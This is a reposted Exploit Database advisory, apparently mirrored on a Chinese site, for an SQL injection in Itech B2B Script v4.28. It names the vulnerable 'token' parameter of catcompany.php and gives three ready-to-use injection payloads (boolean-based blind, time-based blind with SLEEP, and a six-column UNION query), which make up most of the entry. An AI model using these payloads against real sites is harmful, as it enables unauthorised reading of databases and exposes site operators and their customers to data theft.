Itech B2B Script 4.28 – SQL Injection

• Exploit Database
• 15 阅读

• 作者： Kaan KAMIS
  日期： 2017-01-30
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/41188/

• Exploit Title: Itech B2B Script v4.28 – SQL Injection
  Date: 30.01.2017
  Vendor Homepage: http://itechscripts.com/
  Software Link: http://itechscripts.com/b2b-script/
  Exploit Author: Kaan KAMIS
  Contact: iletisim[at]k2an[dot]com
  Website: http://k2an.com
  Category: Web Application Exploits
  
  Overview
  
  B2B Script v4.28 is a versatile web solution for the webmasters who are willing to launch their own B2B Portal within a few minutes.
  
  Type of vulnerability:
  
  An SQL Injection vulnerability in Itech B2B Script v4.28 allows attackers to read
  arbitrary data from the database.
  
  Vulnerability:
  
  URL : catcompany.php?token=704667c6a1e7ce56d3d6fa748ab6d9af3fd7[payload]
  
  Parameter: #1* (URI)
  Type: boolean-based blind
  Title: AND boolean-based blind - WHERE or HAVING clause
  Payload: http://localhost/catcompany.php?token=704667c6a1e7ce56d3d6fa748ab6d9af3fd7' AND 6539=6539 AND 'Fakj'='Fakj
  
  Type: AND/OR time-based blind
  Title: MySQL >= 5.0.12 OR time-based blind
  Payload: http://localhost/catcompany.php?token=704667c6a1e7ce56d3d6fa748ab6d9af3fd7' OR SLEEP(5) AND 'aEyV'='aEyV
  
  Type: UNION query
  Title: Generic UNION query (NULL) - 6 columns
  Payload: http://localhost/catcompany.php?token=-4421' UNION ALL SELECT NULL,CONCAT(0x71627a7071,0x596a5174756f74736847615667486444426f697a5549434943697a697064466865494a7156794770,0x716b707a71),NULL,NULL,NULL,NULL-- JwUA ---